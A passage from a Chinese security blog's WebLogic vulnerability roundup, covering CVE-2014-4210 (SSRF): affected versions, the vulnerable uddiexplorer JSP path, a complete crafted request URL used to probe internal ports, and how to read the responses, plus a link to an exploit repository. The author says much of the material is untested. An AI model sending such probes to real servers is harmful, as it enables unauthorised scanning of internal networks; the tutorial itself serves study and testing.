<p>（3）、利用</p>
<pre class="line-numbers language-none"><code class="language-none">https://github.com/quentinhardy/scriptsAndExploits<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="2-5-4、CVE-2014-4210（Weblogic-SSRF漏洞-）"><a href="#2-5-4、CVE-2014-4210（Weblogic-SSRF漏洞-）" class="headerlink" title="2.5.4、CVE-2014-4210（Weblogic SSRF漏洞 ）"></a>2.5.4、CVE-2014-4210（Weblogic SSRF漏洞 ）</h3><h4 id="（1）、介绍-21"><a href="#（1）、介绍-21" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        SSRF（Server-Side Request Forgery），服务端请求伪造，是一种由攻击者构造形成由服务端发起请求的一个漏洞，一般情况下，SSRF攻击的目标是从外部网络无法访问的内部系统。</p>
<h4 id="（2）、影响版本-21"><a href="#（2）、影响版本-21" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.0.2.0 
10.3.6.0<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-21"><a href="#（3）、利用-21" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p>漏洞位置在uddiexplorer下的SearchPublicRegistries.jsp处</p>
<pre class="line-numbers language-none"><code class="language-none">http://ip:7001//uddiexplorer/SearchPublicRegistries.jsp<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p> <img src="https://img.ex1t.xyz//CVE-2014-4210-1.png" alt="CVE-2014-4210-1"></p>
<p>访问</p>
<pre class="line-numbers language-none"><code class="language-none">http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&amp;txtSearchname=sdf&amp;txtSearchkey=&amp;txtSearchfor=&amp;selfor=Business+location&amp;btnSubmit=Search&amp;operator=http://127.0.0.1:7001<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>访问后显示404说明存在该漏洞</p>
<p> <img src="https://img.ex1t.xyz//CVE-2014-4210-2.png" alt="CVE-2014-4210-2"></p>
<p>通过burg抓包查看相关的返回信息</p>
<p>返回该信息说明开放了7001端口</p>
<p> <img src="https://img.ex1t.xyz//CVE-2014-4210-3.png" alt="CVE-2014-4210-3"></p>
<p>返回</p>
<p>返回could not connect over HTTP to server，说明不存在此端口</p>
<h1 id="四、总结"><a href="#四、总结" class="headerlink" title="四、总结"></a>四、总结</h1><p>​        本文是对Weblogic漏洞的整理，大量信息来源于互联网，如有侵权请告知删除、除了其中的部分内容通过实践证明了，其余部分我并没有实践，所以仅供参考。关于文章中包含的poc或者工具我已全部下载，但没有验证是否存在问题。若需要，可在公众号（诚默的每周学习总结）回复关键词：weblogic，得到下载地址。</p>
<p>​        以上内容仅供学习交流。</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">诚默</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://www.ex1t.xyz/2021/08/02/weblogic%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/">https://www.ex1t.xyz/2021/08/02/weblogic%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">诚默</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/weblogic/">
                                    <span class="chip bg-color">weblogic</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: 'QS25DiKJV53FDn9TcDUAOa8z-gzGzoHsz',
        appKey: 'reyqGLYYvws75kGst7ypLWpq',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '10',
        lang: 'zh-cn',
        placeholder: '兄弟，快来说说你的想法吧'
    });
</script>

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2021/08/10/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E4%B9%8B-windows/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/7.jpg" class="responsive-img" alt="内网信息收集之-windows">
                        
                        <span class="card-title">内网信息收集之-windows</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2021-08-10
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            诚默
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">
                        <span class="chip bg-color">信息收集</span>
                    </a>
                    
                    <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
                        <span class="chip bg-color">内网渗透</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2021/08/02/%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F%E6%80%BB%E7%BB%93/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/12.jpg" class="responsive-img" alt="内网穿透总结">
                        
                        <span class="card-title">内网穿透总结</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-08-02
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            诚默
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/frp/">
                        <span class="chip bg-color">frp</span>
                    </a>
                    
                    <a href="/tags/ew/">
                        <span class="chip bg-color">ew</span>
                    </a>
                    
                    <a href="/tags/regeorg/">
                        <span class="chip bg-color">reGeorg</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('50')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: Ex1t<br />'
            + '文章作者: Ex1t<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2021</span>
            
            <span id="year">2019</span>
            <a href="/about" target="_blank">Ex1t</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">42k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2019";
                    var startMonth = "11";
                    var startDate = "3";
                    var startHour = "0";
                    var startMinute = "0";
                    var startSecond = "0";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            
            <br>
            
            <span id="icp"><img src="/medias/icp.png" style="vertical-align: text-bottom;" />
                <a href="http://www.beian.miit.gov.cn/" target="_blank">皖ICP备 19019341号-1</a>
            </span>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">


    <a href="mailto:k3vi@ex1t.xyz" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>













    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

<script>
    var _hmt = _hmt || [];
    (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?cc6c7e35d6b12dacc8646d6231282352";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
    })();
</script>

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    
    <script type="text/javascript" color="0,0,255"
        pointColor="0,0,255" opacity='0.7'
        zIndex="-1" count="99"
        src="/libs/background/canvas-nest.js"></script>
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
